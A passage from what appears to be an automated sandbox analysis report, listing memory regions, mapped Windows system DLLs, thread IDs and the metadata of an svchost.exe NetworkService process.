start_va = 0x160000 end_va = 0x1a4fff monitored = 0 entry_point = 0x161064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2977 start_va = 0x160000 end_va = 0x1a4fff monitored = 0 entry_point = 0x161064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2978 start_va = 0x160000 end_va = 0x1a4fff monitored = 0 entry_point = 0x161064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2979 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2980 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2981 start_va = 0xab0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2982 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2983 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2984 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3167 start_va = 0xf40000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 3168 start_va = 0xfc0000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 3169 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3184 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 3185 start_va = 0x7fefb350000 end_va = 0x7fefb359fff monitored = 0 entry_point = 0x7fefb3547b8 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3186 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4278 start_va = 0x170000 end_va = 0x180fff monitored = 0 entry_point = 0x186060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4279 start_va = 0x10c0000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 4280 start_va = 0x1240000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 4281 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4287 start_va = 0x7fefd7c0000 end_va = 0x7fefd850fff monitored = 0 entry_point = 0x7fefd7c1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 4288 start_va = 0xb30000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 4289 start_va = 0x190000 end_va = 0x193fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 4500 start_va = 0x13c0000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 4501 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4511 start_va = 0x14b0000 end_va = 0x152ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 4512 start_va = 0x7fef7a30000 end_va = 0x7fef7a48fff monitored = 0 entry_point = 0x7fef7a32b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4513 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4532 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4533 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4534 start_va = 0x1530000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 4535 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4536 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4571 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4572 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 4573 start_va = 0x7fef77d0000 end_va = 0x7fef78a7fff monitored = 0 entry_point = 0x7fef785a7d0 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 4574 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4619 start_va = 0x74310000 end_va = 0x74312fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 4620 start_va = 0x7fef7680000 end_va = 0x7fef76fbfff monitored = 0 entry_point = 0x7fef76811d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 4621 start_va = 0x7fef8b60000 end_va = 0x7fef8b6ffff monitored = 0 entry_point = 0x7fef8b61010 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 4622 start_va = 0x7fef8cc0000 end_va = 0x7fef8cd1fff monitored = 0 entry_point = 0x7fef8cc1050 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 4623 start_va = 0x7fefbca0000 end_va = 0x7fefbcb7fff monitored = 0 entry_point = 0x7fefbca1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4624 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4625 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4626 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4641 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 4672 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 4673 start_va = 0x16f0000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 4674 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4680 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netprofm.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofm.dll.mui") Region: id = 4681 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 4682 start_va = 0x1790000 end_va = 0x180ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001790000" filename = "" Region: id = 4683 start_va = 0x7fef7350000 end_va = 0x7fef735bfff monitored = 0 entry_point = 0x7fef735602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4684 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4685 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4686 start_va = 0x7fef8b70000 end_va = 0x7fef8be0fff monitored = 0 entry_point = 0x7fef8b71010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4687 start_va = 0x7fef8a70000 end_va = 0x7fef8ad3fff monitored = 0 entry_point = 0x7fef8a71254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4688 start_va = 0x1460000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 4689 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4694 start_va = 0x7fefb3b0000 end_va = 0x7fefb3d6fff monitored = 0 entry_point = 0x7fefb3b98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4695 start_va = 0x7fefb3a0000 end_va = 0x7fefb3aafff monitored = 0 entry_point = 0x7fefb3a1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4699 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4700 start_va = 0x1810000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001810000" filename = "" Region: id = 4732 start_va = 0x1820000 end_va = 0x189ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 4733 start_va = 0x19f0000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 4734 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4735 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4742 start_va = 0x2c0000 end_va = 0x2c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 4743 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4744 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 4748 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4749 start_va = 0x1600000 end_va = 0x16bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4750 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4751 start_va = 0x7fefcfd0000 end_va = 0x7fefd02afff monitored = 0 entry_point = 0x7fefcfd6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4752 start_va = 0x18a0000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 4754 start_va = 0x1a00000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4755 start_va = 0x7fef8fc0000 end_va = 0x7fef8fd4fff monitored = 0 entry_point = 0x7fef8fc12a0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4756 start_va = 0x7fef8fe0000 end_va = 0x7fef8ff8fff monitored = 0 entry_point = 0x7fef8fe177c region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4757 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4758 start_va = 0x7fef8fb0000 end_va = 0x7fef8fbafff monitored = 0 entry_point = 0x7fef8fb12e0 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 4759 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4760 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4761 start_va = 0x7fefab20000 end_va = 0x7fefab27fff monitored = 0 entry_point = 0x7fefab21414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4762 start_va = 0x7fefb250000 end_va = 0x7fefb2a2fff monitored = 0 entry_point = 0x7fefb252b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4763 start_va = 0x1a00000 end_va = 0x1aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4764 start_va = 0x1b30000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 4776 start_va = 0x1c30000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 4777 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4785 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4786 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 4827 start_va = 0x7fefb140000 end_va = 0x7fefb150fff monitored = 0 entry_point = 0x7fefb1416ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4828 start_va = 0x7fefb0c0000 end_va = 0x7fefb0d7fff monitored = 0 entry_point = 0x7fefb0c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4877 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 4878 start_va = 0x1da0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 4879 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Thread: id = 344 os_tid = 0x3c8 Thread: id = 346 os_tid = 0x3d0 Thread: id = 347 os_tid = 0x3d4 Thread: id = 350 os_tid = 0x3e0 Thread: id = 351 os_tid = 0x3e4 Thread: id = 357 os_tid = 0x3fc Thread: id = 359 os_tid = 0x108 Thread: id = 364 os_tid = 0x134 Thread: id = 475 os_tid = 0x59c Thread: id = 476 os_tid = 0x5a0 Thread: id = 498 os_tid = 0x60c Thread: id = 500 os_tid = 0x614 Thread: id = 503 os_tid = 0x628 Thread: id = 505 os_tid = 0x630 Thread: id = 519 os_tid = 0x664 Thread: id = 520 os_tid = 0x668 Thread: id = 521 os_tid = 0x66c Thread: id = 522 os_tid = 0x670 Thread: id = 530 os_tid = 0x690 Thread: id = 536 os_tid = 0x6a8 Thread: id = 553 os_tid = 0x700 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x77bc8000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:000104c9" [0xc000000f], "LOCAL" [0x7] Region: id = 3193 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3194 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3195 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3196 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3197 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3198 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3199 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3200 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3201 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3202 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3203 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3204 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3205 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3206 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3207 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3208 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3209 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3210 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3211 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3212 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3213 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3214 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3215 start_va = 0x420000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3216 start_va = 0x1f0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3217 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3218 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3219 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3220 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3221 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3222 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3223 start_va = 0x420000 end_va = 0x5a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3224 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3225 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3226 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3227 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3228 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 3229 start_va = 0x750000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 3230 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 3231 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3232 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3233 start_va = 0xe0000 end_va = 0x15cfff monitored = 0 entry_point = 0xecec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3234 start_va = 0xe0000 end_va = 0x15cfff monitored = 0 entry_point = 0xecec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3235 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3239 start_va = 0x930000 